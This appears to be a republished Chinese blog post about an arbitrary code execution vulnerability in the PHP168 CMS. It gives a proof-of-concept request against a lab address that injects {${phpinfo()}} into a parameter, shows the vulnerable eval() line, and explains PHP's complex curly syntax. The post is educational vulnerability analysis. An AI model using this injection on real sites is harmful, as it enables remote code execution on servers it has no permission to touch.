php 168任意代码执行漏洞之php的Complex (curly) syntax

Posted danku

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了php 168任意代码执行漏洞之php的Complex (curly) syntax相关的知识,希望对你有一定的参考价值。

今天了解了php 168的任意代码执行漏洞,Poc:

http://192.168.6.128/pentest/cms/php168/member/post.php
?only=1
&showHtml_Type[bencandy][1]={${phpinfo()}}
&aid=1
&job=endHTML

通过代码审计得知,最后会执行

eval("\\$array[showurl]=\\"$filename_b\\";");

而$filename_b最终值为**{${phpinfo()}}**

关于{${}}这种形式涉及到了php Complex (curly) syntax,

技术图片

通过上图得知,

eval("\\$array[showurl]=\\"$filename_b\\";");

实际上就是执行了phpinfo();

不理解的童鞋,可以去

https://www.php.net/manual/zh/language.types.string.php自行查阅,

另外,除了字符串之外,{${}}还有别的用法,可以创建一个新的变量,

https://stackoverflow.com/questions/14238120/purpose-of-complex-curly-syntax-outside-a-string-representation

欢迎评论区指导与批评。

以上是关于php 168任意代码执行漏洞之php的Complex (curly) syntax的主要内容,如果未能解决你的问题,请参考以下文章

2020/1/31 PHP代码审计之目录穿越漏洞

代码审计PHPCMS2008任意代码执行漏洞

PHP4-漏洞挖掘思路

CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞(代

2020/1/28 PHP代码审计之代码执行漏洞

路由器漏洞挖掘之 DIR-850/645 命令执行漏洞复现